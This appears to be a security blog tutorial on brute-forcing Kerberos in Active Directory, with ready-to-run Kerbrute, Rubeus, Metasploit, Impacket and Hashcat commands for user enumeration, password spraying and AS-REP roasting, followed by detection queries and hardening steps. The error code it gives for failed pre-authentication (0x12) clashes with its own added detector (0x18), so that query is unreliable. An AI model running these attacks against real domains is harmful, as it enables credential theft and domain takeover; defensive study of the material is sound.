Kerberos Brute Force Attack: How Attackers Crack Active Directory’s Crown Jewel Authentication + Video


Introduction:

Kerberos is the default authentication protocol in Microsoft Active Directory (AD), relied upon by enterprises worldwide for secure identity verification. However, when misconfigured — especially with weak password policies or disabled account lockout — attackers can perform brute-force attacks against the Kerberos service on port 88, enabling username enumeration, password guessing, and eventual domain compromise. This article dissects real-world Kerberos abuse techniques, provides hands-on commands using tools like Kerbrute, Rubeus, and Metasploit, and offers actionable hardening steps to defend your AD environment.

Learning Objectives:

  • Understand how Kerberos pre-authentication works and why it can be brute-forced.
  • Execute username enumeration and password spraying attacks against Active Directory using Kerbrute and Metasploit.
  • Apply detection rules and mitigation controls to block Kerberos brute-force attempts.

You Should Know:

1. Kerberos Authentication Basics and Attack Surface

Kerberos uses tickets (TGT, TGS) and involves three entities: client, Key Distribution Center (KDC), and resource server. The KDC listens on port 88 (UDP/TCP). In a brute-force scenario, attackers send AS-REQ (Authentication Service Request) messages with guessed usernames/passwords and analyze the error codes in AS-REP responses. Common reply codes:
– `eRR-PREAUTH-FAILED` (0x12) → valid username, wrong password.
– `eRR-NO-SUCH-USER` (0x6) → invalid username.

Attack prerequisite: No account lockout policy, or a lockout threshold high enough to allow many guesses.

Linux command to test Kerberos connectivity:

nmap -p 88 --script krb5-enum-users <DC-IP>

Windows PowerShell test:

Test-NetConnection -ComputerName <DC-FQDN> -Port 88

2. Username Enumeration with Kerbrute (Linux)

Kerbrute is a fast tool that uses Kerberos pre-authentication to enumerate valid domain users without generating Windows event 4625 (failed logon) if done carefully.

Step‑by‑step guide:

1. Install Kerbrute on Kali Linux:

sudo apt install kerbrute -y
# or download the release binary from GitHub
wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
chmod +x kerbrute_linux_amd64
sudo mv kerbrute_linux_amd64 /usr/local/bin/kerbrute

2. Prepare a username wordlist (e.g., `names.txt`):

administrator
jsmith
mross
bkane

3. Enumerate users against the Domain Controller (DC):

kerbrute userenum --dc <DC-IP> -d <DOMAIN> names.txt

Example:

kerbrute userenum --dc 192.168.1.10 -d corp.local users.txt

4. Output will show `[+] VALID USERNAME:` for found users and `[!] Invalid username` for others.

Windows alternative with PowerShell and Rubeus:

.\Rubeus.exe brute /users:users.txt /domain:corp.local /dc:192.168.1.10

3. Password Brute-Force Against Kerberos

Once valid usernames are identified, attackers perform password spraying (one common password against many users) or traditional brute-force.

Using Kerbrute for password spraying:

kerbrute passwordspray --dc <DC-IP> -d <DOMAIN> userlist.txt "Winter2025"

Using Metasploit auxiliary module:

msf6 > use auxiliary/admin/kerberos/kerberos_login
msf6 auxiliary(admin/kerberos/kerberos_login) > set RHOSTS <DC-IP>
msf6 auxiliary(admin/kerberos/kerberos_login) > set DOMAIN <DOMAIN>
msf6 auxiliary(admin/kerberos/kerberos_login) > set USER_FILE /path/to/users.txt
msf6 auxiliary(admin/kerberos/kerberos_login) > set PASS_FILE /path/to/passwords.txt
msf6 auxiliary(admin/kerberos/kerberos_login) > run

Manual approach using Impacket (Linux):

# Single user, single password
python3 /usr/share/doc/python3-impacket/examples/getTGT.py <DOMAIN>/<USER> -dc-ip <DC-IP> -password '<PASSWORD>'

# Password spraying loop (one password against every user in users.txt)
for user in $(cat users.txt); do
python3 getTGT.py corp.local/$user -dc-ip 192.168.1.10 -password 'Spring2025' 2>/dev/null && echo "SUCCESS: $user"
done

Important: These attempts generate event ID 4771 (Kerberos pre-authentication failed) on the DC, which can trigger alerts.

4. Exploiting Pre-Authentication Weaknesses (AS-REP Roasting)

If a user account has the “Do not require Kerberos pre-authentication” setting enabled, an attacker can request an AS-REP ticket and crack it offline — no password needed, only username enumeration.

Step‑by‑step using Rubeus (Windows):

1. Enumerate users with pre-auth disabled:

.\Rubeus.exe asreproast /format:hashcat /outfile:asrep-hashes.txt

2. Crack the hash with Hashcat (Linux):

hashcat -m 18200 asrep-hashes.txt /usr/share/wordlists/rockyou.txt

Using Impacket (Linux):

python3 GetNPUsers.py <DOMAIN>/ -dc-ip <DC-IP> -request -format hashcat -outputfile asrep.txt

Mitigation: Identify and disable the “Do not require Kerberos pre-authentication” flag on all user accounts (it should never be enabled except for legacy service accounts).

5. Real-World AD Attack Chain: From Enumeration to Privilege Escalation

A typical red team sequence:

  1. Reconnaissance: Use `kerbrute userenum` to find valid usernames from an external or internal position.
  2. Password spraying: Try seasonal passwords (e.g., Summer2025!, Corp@2025) against all enumerated users.
  3. Initial access: Valid credentials grant a TGT, which can be used with `kinit` (Linux) or Rubeus to request service tickets.
  4. Lateral movement: Use `psexec` or `winrm` with the stolen TGT.
  5. Privilege escalation: Dump LSASS, perform DCSync, or abuse Kerberoastable service accounts.

Example Linux command to request a TGT after cracking a password (the Kerberos realm is the AD domain name in upper case):

kinit <USER>@<REALM>
klist

Example Windows (Rubeus) to request TGT and pass the ticket:

.\Rubeus.exe asktgt /user:jsmith /password:Summer2025! /domain:corp.local /dc:192.168.1.10 /ptt

6. Detection and Hardening – Stop Kerberos Brute Force

Detection via Windows Event Logs:

  • Event ID 4771 (Kerberos pre-authentication failed) – Look for many failures from the same source IP across multiple accounts.
  • Event ID 4625 (Logon failure) – Also generated, but 4771 is specific to Kerberos.
  • Event ID 4768 (Kerberos TGT requested) – Unusual volume may indicate spraying.

PowerShell query to detect brute-force:

# Properties[6] is the IpAddress field of event 4771 (TargetUserName, TargetSid, ServiceName,
# TicketOptions, Status, PreAuthType, IpAddress, ...); group failures by source address
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4771} |
    Where-Object { $_.Message -match "0x12" } |
    Group-Object -Property @{Expression={ $_.Properties[6].Value }} |
    Where-Object { $_.Count -gt 10 }
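The same grouping logic as an offline script over exported 4771 events, added here as an example (not code from the original post): it keys on source address and distinct target accounts, so a spray (many accounts, one attempt each) is flagged separately from a classic brute force against one account. The sample events are constructed; the field names mirror the 4771 EventData fields, and the Status value assumes RFC 4120's KDC_ERR_PREAUTH_FAILED (error 24, logged as 0x18).

```python
from collections import defaultdict

# Constructed sample 4771 events (not real logs). Field names follow the
# EventData of Security event 4771: TargetUserName, IpAddress, Status.
# KDC_ERR_PREAUTH_FAILED is error 24 in RFC 4120, which 4771 logs as 0x18.
SAMPLE_4771 = (
    # one source, one failure each against six different accounts -> spray
    [{"TargetUserName": u, "IpAddress": "::ffff:10.0.0.55", "Status": "0x18"}
     for u in ["administrator", "jsmith", "mross", "bkane", "svc_backup", "tlee"]]
    # one source, twelve failures against a single account -> brute force
    + [{"TargetUserName": "jsmith", "IpAddress": "::ffff:10.0.0.77", "Status": "0x18"}
       for _ in range(12)]
    # a single typo from a workstation -> benign noise
    + [{"TargetUserName": "mross", "IpAddress": "::ffff:10.0.0.91", "Status": "0x18"}]
)

PREAUTH_FAILED = {"0x18"}


def detect_kerberos_bruteforce(events, min_failures=10, min_accounts=5):
    """Group pre-auth failures by source address and flag two patterns:
    'spray' - one source failing against at least min_accounts distinct accounts
    'brute' - one source failing at least min_failures times (few accounts)
    Returns a list of (kind, source_ip, failures, distinct_accounts)."""
    per_source = defaultdict(list)
    for ev in events:
        if ev.get("Status") in PREAUTH_FAILED:
            per_source[ev["IpAddress"]].append(ev["TargetUserName"])
    findings = []
    for src, users in per_source.items():
        distinct = len(set(users))
        if distinct >= min_accounts:
            findings.append(("spray", src, len(users), distinct))
        elif len(users) >= min_failures:
            findings.append(("brute", src, len(users), distinct))
    return findings


if __name__ == "__main__":
    for kind, src, n, d in detect_kerberos_bruteforce(SAMPLE_4771):
        print(f"{kind:5} from {src}: {n} failures across {d} account(s)")
```

A slow spray of the kind described in the analysis below (one guess every 30 minutes) only crosses these thresholds if the export covers a long enough window, so run it over days of events rather than a single hour.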

Hardening measures:

  • Enforce account lockout policy (e.g., 5 invalid attempts lockout for 15 minutes).
  • Enable SMB signing and LDAP signing to prevent relay attacks.
  • Disable RC4 encryption for Kerberos (use AES).
  • Regularly audit accounts with “Do not require pre-authentication”.
  • Deploy a SIEM with rules for 4771 spikes.

Group Policy path for lockout:

`Computer Configuration → Windows Settings → Security Settings → Account Policies → Account Lockout Policy`

7. Tools and Commands Reference Table

| Tool | Platform | Purpose | Example |
|---|---|---|---|
| Kerbrute | Linux | Username enum, password spray | `kerbrute userenum --dc 10.0.0.1 -d lab.local users.txt` |
| Rubeus | Windows | AS-REP roast, TGT request, brute | `.\Rubeus.exe brute /passwords:pass.txt /noticket` |
| Metasploit | Cross | Kerberos login module | `use auxiliary/admin/kerberos/kerberos_login` |
| Impacket | Linux | GetTGT, GetNPUsers, Kerberoast | `python3 GetNPUsers.py domain.com/ -dc-ip 10.0.0.1 -request` |
| Hashcat | Linux | Crack AS-REP or TGS hashes | `hashcat -m 18200 asrep.txt rockyou.txt` |

What Undercode Says:

  • Key Takeaway 1: Kerberos brute-force is not theoretical — tools like Kerbrute make it trivial to enumerate users and spray passwords, especially when account lockout is disabled. Many enterprises overlook Kerberos-specific logging, allowing attackers to go unnoticed.
  • Key Takeaway 2: AS-REP roasting remains a high-impact, low-noise attack because it doesn’t require any password guess — only a valid username. Removing the “pre-authentication not required” flag from all user accounts is a quick win.

Analysis: While modern EDR and SIEM solutions can detect Kerberos brute-force via event ID 4771 spikes, attackers have adapted by slowing down password sprays (e.g., one attempt every 30 minutes) or using distributed source IPs. Defenders must combine lockout policies, network segmentation, and Kerberos hardening (AES-only, pre-auth required) to effectively mitigate. Additionally, moving towards passwordless authentication (e.g., Windows Hello for Business, FIDO2) eliminates the password spray surface entirely.

Prediction:

Within two years, AI-driven Kerberos attacks will emerge — using large language models to generate targeted username and password wordlists based on scraped LinkedIn profiles, corporate email formats, and breach dumps. Simultaneously, cloud-joined AD (Azure AD DS) and hybrid identities will introduce new Kerberos attack paths via on-prem connectors. The most effective defense will shift from reactive brute-force detection to proactive credential elimination using certificate-based or biometric authentication, making Kerberos password attacks obsolete — but only for organizations that fully migrate. Those stuck with legacy AD will remain vulnerable to the same techniques described in this guide.

Reported By: Kinjalpatel Pt – Hackers Feeds